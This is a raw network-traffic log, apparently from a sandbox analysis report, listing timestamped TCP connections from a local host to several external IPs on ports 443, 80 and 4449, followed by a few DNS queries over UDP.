Jul 24, 2024 19:58:45.939096928 CEST	49842	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:58:45.940339088 CEST	49842	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:58:45.940368891 CEST	443	49842	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:46.739643097 CEST	443	49842	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:46.739765882 CEST	49842	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:58:46.743078947 CEST	49842	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:58:46.743088961 CEST	443	49842	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:46.743171930 CEST	49842	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:58:46.743175030 CEST	443	49842	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:46.743230104 CEST	49842	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:58:46.743232965 CEST	443	49842	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:46.743320942 CEST	443	49842	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:46.743532896 CEST	49842	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:58:46.784492016 CEST	443	49842	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:47.762753963 CEST	443	49842	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:47.762826920 CEST	443	49842	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:47.762882948 CEST	49842	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:58:47.779645920 CEST	49842	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:58:47.779673100 CEST	443	49842	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:47.779706001 CEST	49842	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:58:47.779711962 CEST	443	49842	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:47.892153978 CEST	49843	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:58:47.892215967 CEST	443	49843	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:47.892311096 CEST	49843	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:58:47.892932892 CEST	49843	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:58:47.892957926 CEST	443	49843	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:48.522409916 CEST	443	49843	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:48.522524118 CEST	49843	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:58:48.525374889 CEST	49843	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:58:48.525397062 CEST	443	49843	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:48.525438070 CEST	49843	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:58:48.525444984 CEST	443	49843	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:48.525475979 CEST	49843	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:58:48.525480986 CEST	443	49843	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:48.525633097 CEST	443	49843	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:48.525748014 CEST	49843	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:58:48.568515062 CEST	443	49843	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:49.863337994 CEST	443	49843	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:49.863512993 CEST	443	49843	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:49.863591909 CEST	49843	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:58:49.879637003 CEST	49843	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:58:49.879637003 CEST	49843	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:58:49.879683018 CEST	443	49843	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:49.879698992 CEST	443	49843	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:49.985656023 CEST	49844	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:58:49.985723972 CEST	443	49844	107.173.160.139	192.168.2.10
Jul 24, 2024 19:58:49.985841990 CEST	49844	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:58:49.986260891 CEST	49844	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:58:49.986282110 CEST	443	49844	107.173.160.139	192.168.2.10
Jul 24, 2024 19:58:50.637792110 CEST	443	49844	107.173.160.139	192.168.2.10
Jul 24, 2024 19:58:50.638017893 CEST	49844	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:58:50.640938044 CEST	49844	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:58:50.640971899 CEST	443	49844	107.173.160.139	192.168.2.10
Jul 24, 2024 19:58:50.641104937 CEST	49844	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:58:50.641118050 CEST	443	49844	107.173.160.139	192.168.2.10
Jul 24, 2024 19:58:50.641309977 CEST	443	49844	107.173.160.139	192.168.2.10
Jul 24, 2024 19:58:50.641509056 CEST	49844	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:58:50.684497118 CEST	443	49844	107.173.160.139	192.168.2.10
Jul 24, 2024 19:58:51.954474926 CEST	49821	4449	192.168.2.10	94.156.79.190
Jul 24, 2024 19:58:51.960119963 CEST	4449	49821	94.156.79.190	192.168.2.10
Jul 24, 2024 19:58:51.960222960 CEST	49821	4449	192.168.2.10	94.156.79.190
Jul 24, 2024 19:58:51.965272903 CEST	4449	49821	94.156.79.190	192.168.2.10
Jul 24, 2024 19:58:52.003283978 CEST	443	49844	107.173.160.139	192.168.2.10
Jul 24, 2024 19:58:52.003380060 CEST	443	49844	107.173.160.139	192.168.2.10
Jul 24, 2024 19:58:52.003494978 CEST	49844	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:58:52.019803047 CEST	49844	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:58:52.019846916 CEST	443	49844	107.173.160.139	192.168.2.10
Jul 24, 2024 19:58:52.019908905 CEST	49844	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:58:52.019920111 CEST	443	49844	107.173.160.139	192.168.2.10
Jul 24, 2024 19:58:52.126545906 CEST	49845	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:58:52.126689911 CEST	443	49845	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:52.126837969 CEST	49845	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:58:52.127371073 CEST	49845	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:58:52.127408981 CEST	443	49845	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:52.338001966 CEST	4449	49821	94.156.79.190	192.168.2.10
Jul 24, 2024 19:58:52.485105038 CEST	49821	4449	192.168.2.10	94.156.79.190
Jul 24, 2024 19:58:52.504530907 CEST	4449	49821	94.156.79.190	192.168.2.10
Jul 24, 2024 19:58:52.672566891 CEST	49821	4449	192.168.2.10	94.156.79.190
Jul 24, 2024 19:58:52.849956036 CEST	49821	4449	192.168.2.10	94.156.79.190
Jul 24, 2024 19:58:52.854991913 CEST	4449	49821	94.156.79.190	192.168.2.10
Jul 24, 2024 19:58:52.855056047 CEST	49821	4449	192.168.2.10	94.156.79.190
Jul 24, 2024 19:58:52.865813017 CEST	4449	49821	94.156.79.190	192.168.2.10
Jul 24, 2024 19:58:52.906605959 CEST	443	49845	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:52.906692028 CEST	49845	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:58:52.917598963 CEST	49845	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:58:52.917613983 CEST	443	49845	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:52.918709993 CEST	49845	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:58:52.918714046 CEST	443	49845	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:52.919862032 CEST	49845	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:58:52.919867039 CEST	443	49845	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:52.919955969 CEST	443	49845	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:52.920087099 CEST	49845	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:58:52.960498095 CEST	443	49845	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:53.968689919 CEST	443	49845	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:53.968784094 CEST	443	49845	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:53.968883038 CEST	49845	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:58:53.982476950 CEST	49845	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:58:53.982501030 CEST	443	49845	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:53.982515097 CEST	49845	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:58:53.982520103 CEST	443	49845	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:54.095175982 CEST	49846	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:58:54.095240116 CEST	443	49846	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:54.095429897 CEST	49846	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:58:54.095910072 CEST	49846	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:58:54.095922947 CEST	443	49846	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:54.746768951 CEST	443	49846	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:54.746989012 CEST	49846	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:58:54.749624014 CEST	49846	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:58:54.749649048 CEST	443	49846	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:54.749711037 CEST	49846	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:58:54.749717951 CEST	443	49846	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:54.750288010 CEST	443	49846	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:54.750432014 CEST	49846	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:58:54.792541981 CEST	443	49846	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:55.788597107 CEST	49847	80	192.168.2.10	211.168.53.110
Jul 24, 2024 19:58:55.793622971 CEST	80	49847	211.168.53.110	192.168.2.10
Jul 24, 2024 19:58:55.793802023 CEST	49847	80	192.168.2.10	211.168.53.110
Jul 24, 2024 19:58:55.793935061 CEST	49847	80	192.168.2.10	211.168.53.110
Jul 24, 2024 19:58:55.793965101 CEST	49847	80	192.168.2.10	211.168.53.110
Jul 24, 2024 19:58:55.799072027 CEST	80	49847	211.168.53.110	192.168.2.10
Jul 24, 2024 19:58:55.819842100 CEST	80	49847	211.168.53.110	192.168.2.10
Jul 24, 2024 19:58:56.149471998 CEST	443	49846	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:56.149672031 CEST	443	49846	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:56.149755001 CEST	49846	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:58:56.165524006 CEST	49846	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:58:56.165568113 CEST	443	49846	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:56.165596008 CEST	49846	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:58:56.165606022 CEST	443	49846	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:56.266931057 CEST	49848	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:58:56.266998053 CEST	443	49848	107.173.160.139	192.168.2.10
Jul 24, 2024 19:58:56.267055988 CEST	49848	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:58:56.267515898 CEST	49848	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:58:56.267530918 CEST	443	49848	107.173.160.139	192.168.2.10
Jul 24, 2024 19:58:56.909554005 CEST	443	49848	107.173.160.139	192.168.2.10
Jul 24, 2024 19:58:56.909714937 CEST	49848	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:58:56.912220001 CEST	49848	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:58:56.912269115 CEST	443	49848	107.173.160.139	192.168.2.10
Jul 24, 2024 19:58:56.912400007 CEST	49848	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:58:56.912414074 CEST	443	49848	107.173.160.139	192.168.2.10
Jul 24, 2024 19:58:56.912597895 CEST	443	49848	107.173.160.139	192.168.2.10
Jul 24, 2024 19:58:56.912767887 CEST	49848	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:58:56.912801981 CEST	443	49848	107.173.160.139	192.168.2.10
Jul 24, 2024 19:58:57.302325010 CEST	80	49847	211.168.53.110	192.168.2.10
Jul 24, 2024 19:58:57.302351952 CEST	80	49847	211.168.53.110	192.168.2.10
Jul 24, 2024 19:58:57.302448988 CEST	49847	80	192.168.2.10	211.168.53.110
Jul 24, 2024 19:58:57.302684069 CEST	49847	80	192.168.2.10	211.168.53.110
Jul 24, 2024 19:58:57.307877064 CEST	80	49847	211.168.53.110	192.168.2.10
Jul 24, 2024 19:58:58.052845955 CEST	443	49848	107.173.160.139	192.168.2.10
Jul 24, 2024 19:58:58.052937031 CEST	443	49848	107.173.160.139	192.168.2.10
Jul 24, 2024 19:58:58.053002119 CEST	49848	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:58:58.068324089 CEST	49848	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:58:58.068361998 CEST	443	49848	107.173.160.139	192.168.2.10
Jul 24, 2024 19:58:58.068380117 CEST	49848	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:58:58.068388939 CEST	443	49848	107.173.160.139	192.168.2.10
Jul 24, 2024 19:58:58.173257113 CEST	49849	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:58:58.173314095 CEST	443	49849	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:58.173378944 CEST	49849	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:58:58.173856974 CEST	49849	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:58:58.173870087 CEST	443	49849	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:58.964356899 CEST	443	49849	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:58.964441061 CEST	49849	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:58:58.984833002 CEST	49849	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:58:58.984857082 CEST	443	49849	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:58.984895945 CEST	49849	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:58:58.984899998 CEST	443	49849	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:58.985085964 CEST	443	49849	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:58.985219002 CEST	49849	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:58:58.985229015 CEST	443	49849	167.235.128.153	192.168.2.10
Jul 24, 2024 19:59:00.051139116 CEST	443	49849	167.235.128.153	192.168.2.10
Jul 24, 2024 19:59:00.051232100 CEST	443	49849	167.235.128.153	192.168.2.10
Jul 24, 2024 19:59:00.051284075 CEST	49849	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:59:00.066492081 CEST	49849	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:59:00.066524982 CEST	443	49849	167.235.128.153	192.168.2.10
Jul 24, 2024 19:59:00.066545010 CEST	49849	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:59:00.066550970 CEST	443	49849	167.235.128.153	192.168.2.10
Jul 24, 2024 19:59:00.173248053 CEST	49850	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:59:00.173322916 CEST	443	49850	107.173.160.137	192.168.2.10
Jul 24, 2024 19:59:00.173396111 CEST	49850	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:59:00.173911095 CEST	49850	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:59:00.173924923 CEST	443	49850	107.173.160.137	192.168.2.10
Jul 24, 2024 19:59:00.850312948 CEST	443	49850	107.173.160.137	192.168.2.10
Jul 24, 2024 19:59:00.850423098 CEST	49850	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:59:00.853571892 CEST	49850	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:59:00.853589058 CEST	443	49850	107.173.160.137	192.168.2.10
Jul 24, 2024 19:59:00.853645086 CEST	49850	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:59:00.853650093 CEST	443	49850	107.173.160.137	192.168.2.10
Jul 24, 2024 19:59:00.853689909 CEST	49850	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:59:00.853694916 CEST	443	49850	107.173.160.137	192.168.2.10
Jul 24, 2024 19:59:00.853807926 CEST	443	49850	107.173.160.137	192.168.2.10
Jul 24, 2024 19:59:00.853935957 CEST	49850	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:59:00.896503925 CEST	443	49850	107.173.160.137	192.168.2.10
Jul 24, 2024 19:59:02.170826912 CEST	443	49850	107.173.160.137	192.168.2.10
Jul 24, 2024 19:59:02.171010017 CEST	443	49850	107.173.160.137	192.168.2.10
Jul 24, 2024 19:59:02.171089888 CEST	49850	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:59:02.299676895 CEST	49850	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:59:02.299710989 CEST	443	49850	107.173.160.137	192.168.2.10
Jul 24, 2024 19:59:02.299730062 CEST	49850	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:59:02.299737930 CEST	443	49850	107.173.160.137	192.168.2.10
Jul 24, 2024 19:59:02.408067942 CEST	49851	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:59:02.408121109 CEST	443	49851	107.173.160.139	192.168.2.10
Jul 24, 2024 19:59:02.408209085 CEST	49851	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:59:02.408689022 CEST	49851	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:59:02.408699989 CEST	443	49851	107.173.160.139	192.168.2.10
Jul 24, 2024 19:59:03.109467983 CEST	443	49851	107.173.160.139	192.168.2.10
Jul 24, 2024 19:59:03.109601974 CEST	49851	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:59:03.112413883 CEST	49851	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:59:03.112438917 CEST	443	49851	107.173.160.139	192.168.2.10
Jul 24, 2024 19:59:03.112510920 CEST	49851	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:59:03.112518072 CEST	443	49851	107.173.160.139	192.168.2.10
Jul 24, 2024 19:59:03.112593889 CEST	49851	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:59:03.112598896 CEST	443	49851	107.173.160.139	192.168.2.10
Jul 24, 2024 19:59:03.112773895 CEST	443	49851	107.173.160.139	192.168.2.10
Jul 24, 2024 19:59:03.112943888 CEST	49851	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:59:03.160523891 CEST	443	49851	107.173.160.139	192.168.2.10
Jul 24, 2024 19:59:03.884275913 CEST	49821	4449	192.168.2.10	94.156.79.190
Jul 24, 2024 19:59:03.889202118 CEST	4449	49821	94.156.79.190	192.168.2.10
Jul 24, 2024 19:59:03.889422894 CEST	49821	4449	192.168.2.10	94.156.79.190
Jul 24, 2024 19:59:03.895030022 CEST	4449	49821	94.156.79.190	192.168.2.10
Jul 24, 2024 19:59:04.238306046 CEST	4449	49821	94.156.79.190	192.168.2.10
Jul 24, 2024 19:59:04.282007933 CEST	49821	4449	192.168.2.10	94.156.79.190
Jul 24, 2024 19:59:04.335882902 CEST	443	49851	107.173.160.139	192.168.2.10
Jul 24, 2024 19:59:04.335988045 CEST	443	49851	107.173.160.139	192.168.2.10
Jul 24, 2024 19:59:04.336069107 CEST	49851	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:59:04.351403952 CEST	49851	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:59:04.351443052 CEST	443	49851	107.173.160.139	192.168.2.10
Jul 24, 2024 19:59:04.351461887 CEST	49851	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:59:04.351470947 CEST	443	49851	107.173.160.139	192.168.2.10
Jul 24, 2024 19:59:04.391109943 CEST	4449	49821	94.156.79.190	192.168.2.10
Jul 24, 2024 19:59:04.479847908 CEST	49852	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:59:04.479897022 CEST	443	49852	167.235.128.153	192.168.2.10
Jul 24, 2024 19:59:04.480047941 CEST	49852	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:59:04.480475903 CEST	49852	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:59:04.480495930 CEST	443	49852	167.235.128.153	192.168.2.10
Jul 24, 2024 19:59:04.495045900 CEST	49821	4449	192.168.2.10	94.156.79.190
Jul 24, 2024 19:59:04.500123978 CEST	4449	49821	94.156.79.190	192.168.2.10
Jul 24, 2024 19:59:04.500372887 CEST	49821	4449	192.168.2.10	94.156.79.190
Jul 24, 2024 19:59:04.505610943 CEST	4449	49821	94.156.79.190	192.168.2.10
Jul 24, 2024 19:59:05.224916935 CEST	443	49852	167.235.128.153	192.168.2.10
Jul 24, 2024 19:59:05.225194931 CEST	49852	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:59:05.227546930 CEST	49852	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:59:05.227566004 CEST	443	49852	167.235.128.153	192.168.2.10
Jul 24, 2024 19:59:05.227616072 CEST	49852	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:59:05.227619886 CEST	443	49852	167.235.128.153	192.168.2.10
Jul 24, 2024 19:59:05.227664948 CEST	49852	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:59:05.227668047 CEST	443	49852	167.235.128.153	192.168.2.10
Jul 24, 2024 19:59:05.227790117 CEST	443	49852	167.235.128.153	192.168.2.10
Jul 24, 2024 19:59:05.227911949 CEST	49852	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:59:05.268498898 CEST	443	49852	167.235.128.153	192.168.2.10
Jul 24, 2024 19:59:06.149869919 CEST	443	49852	167.235.128.153	192.168.2.10
Jul 24, 2024 19:59:06.149964094 CEST	443	49852	167.235.128.153	192.168.2.10
Jul 24, 2024 19:59:06.150182009 CEST	49852	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:59:06.166721106 CEST	49852	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:59:06.166752100 CEST	443	49852	167.235.128.153	192.168.2.10
Jul 24, 2024 19:59:06.166770935 CEST	49852	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:59:06.166778088 CEST	443	49852	167.235.128.153	192.168.2.10
Jul 24, 2024 19:59:06.282660007 CEST	49853	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:59:06.282753944 CEST	443	49853	107.173.160.137	192.168.2.10
Jul 24, 2024 19:59:06.282860041 CEST	49853	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:59:06.283288956 CEST	49853	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:59:06.283328056 CEST	443	49853	107.173.160.137	192.168.2.10
Jul 24, 2024 19:59:07.562704086 CEST	443	49853	107.173.160.137	192.168.2.10
Jul 24, 2024 19:59:07.562807083 CEST	49853	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:59:07.593370914 CEST	49853	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:59:07.593401909 CEST	443	49853	107.173.160.137	192.168.2.10
Jul 24, 2024 19:59:07.593452930 CEST	49853	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:59:07.593457937 CEST	443	49853	107.173.160.137	192.168.2.10
Jul 24, 2024 19:59:07.593492985 CEST	49853	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:59:07.593497992 CEST	443	49853	107.173.160.137	192.168.2.10
Jul 24, 2024 19:59:07.594281912 CEST	443	49853	107.173.160.137	192.168.2.10
Jul 24, 2024 19:59:07.594486952 CEST	49853	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:59:07.640505075 CEST	443	49853	107.173.160.137	192.168.2.10
Jul 24, 2024 19:59:08.933173895 CEST	443	49853	107.173.160.137	192.168.2.10
Jul 24, 2024 19:59:08.933269024 CEST	443	49853	107.173.160.137	192.168.2.10
Jul 24, 2024 19:59:08.933399916 CEST	49853	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:59:08.949589014 CEST	49853	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:59:08.949636936 CEST	443	49853	107.173.160.137	192.168.2.10
Jul 24, 2024 19:59:08.949745893 CEST	49853	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:59:08.949755907 CEST	443	49853	107.173.160.137	192.168.2.10
Jul 24, 2024 19:59:09.066941977 CEST	49854	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:59:09.067007065 CEST	443	49854	107.173.160.139	192.168.2.10
Jul 24, 2024 19:59:09.067075968 CEST	49854	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:59:09.067482948 CEST	49854	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:59:09.067495108 CEST	443	49854	107.173.160.139	192.168.2.10
Jul 24, 2024 19:59:09.709146976 CEST	443	49854	107.173.160.139	192.168.2.10
Jul 24, 2024 19:59:09.709264040 CEST	49854	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:59:09.712718964 CEST	49854	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:59:09.712729931 CEST	443	49854	107.173.160.139	192.168.2.10
Jul 24, 2024 19:59:09.712810993 CEST	49854	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:59:09.712816000 CEST	443	49854	107.173.160.139	192.168.2.10
Jul 24, 2024 19:59:09.712851048 CEST	49854	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:59:09.712855101 CEST	443	49854	107.173.160.139	192.168.2.10
Jul 24, 2024 19:59:09.712979078 CEST	443	49854	107.173.160.139	192.168.2.10
Jul 24, 2024 19:59:09.713089943 CEST	49854	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:59:09.760507107 CEST	443	49854	107.173.160.139	192.168.2.10
Jul 24, 2024 19:59:10.947396994 CEST	443	49854	107.173.160.139	192.168.2.10
Jul 24, 2024 19:59:10.947489023 CEST	443	49854	107.173.160.139	192.168.2.10
Jul 24, 2024 19:59:10.947607040 CEST	49854	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:59:10.980963945 CEST	49854	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:59:10.981013060 CEST	443	49854	107.173.160.139	192.168.2.10
Jul 24, 2024 19:59:10.981034994 CEST	49854	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:59:10.981041908 CEST	443	49854	107.173.160.139	192.168.2.10
Jul 24, 2024 19:59:12.577533007 CEST	49821	4449	192.168.2.10	94.156.79.190
Jul 24, 2024 19:59:12.583456039 CEST	4449	49821	94.156.79.190	192.168.2.10
Jul 24, 2024 19:59:12.583523989 CEST	49821	4449	192.168.2.10	94.156.79.190
Jul 24, 2024 19:59:12.590893984 CEST	4449	49821	94.156.79.190	192.168.2.10
Jul 24, 2024 19:59:12.941451073 CEST	4449	49821	94.156.79.190	192.168.2.10
Jul 24, 2024 19:59:12.985094070 CEST	49821	4449	192.168.2.10	94.156.79.190
Jul 24, 2024 19:59:13.093833923 CEST	4449	49821	94.156.79.190	192.168.2.10
Jul 24, 2024 19:59:13.095089912 CEST	49821	4449	192.168.2.10	94.156.79.190
Jul 24, 2024 19:59:13.099958897 CEST	4449	49821	94.156.79.190	192.168.2.10
Jul 24, 2024 19:59:13.100207090 CEST	49821	4449	192.168.2.10	94.156.79.190
Jul 24, 2024 19:59:13.105195045 CEST	4449	49821	94.156.79.190	192.168.2.10

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 24, 2024 19:55:04.239382029 CEST	51349	53	192.168.2.10	1.1.1.1
Jul 24, 2024 19:55:05.253161907 CEST	51349	53	192.168.2.10	1.1.1.1
Jul 24, 2024 19:55:06.316844940 CEST	51349	53	192.168.2.10	1.1.1.1
Jul 24, 2024 19:55:07.850765944 CEST	53	51349	1.1.1.1	192.168.2.10
Jul 24, 2024 19:55:07.850812912 CEST	53	51349	1.1.1.1	192.168.2.10
Jul 24, 2024 19:55:07.850853920 CEST	53	51349	1.1.1.1	192.168.2.10
Jul 24, 2024 19:55:38.598268032 CEST	63511	53	192.168.2.10	1.1.1.1
Jul 24, 2024 19:55:39.606379986 CEST	63511	53	192.168.2.10	1.1.1.1
Jul 24, 2024 19:55:40.622288942 CEST	63511	53	192.168.2.10	1.1.1.1
Jul 24, 2024 19:55:41.434992075 CEST	53	63511	1.1.1.1	192.168.2.10
Jul 24, 2024 19:55:41.435039997 CEST	53	63511	1.1.1.1	192.168.2.10
Jul 24, 2024 19:55:41.435409069 CEST	53	63511	1.1.1.1	192.168.2.10
Jul 24, 2024 19:55:43.499428988 CEST	56208	53	192.168.2.10	1.1.1.1
Jul 24, 2024 19:55:44.512749910 CEST	56208	53	192.168.2.10	1.1.1.1
Jul 24, 2024 19:55:45.512440920 CEST	56208	53	192.168.2.10	1.1.1.1
Jul 24, 2024 19:55:45.885318995 CEST	53	56208	1.1.1.1	192.168.2.10
Jul 24, 2024 19:55:45.885332108 CEST	53	56208	1.1.1.1	192.168.2.10
Jul 24, 2024 19:55:45.885881901 CEST	53	56208	1.1.1.1	192.168.2.10
Jul 24, 2024 19:56:29.008738041 CEST	52375	53	192.168.2.10	1.1.1.1
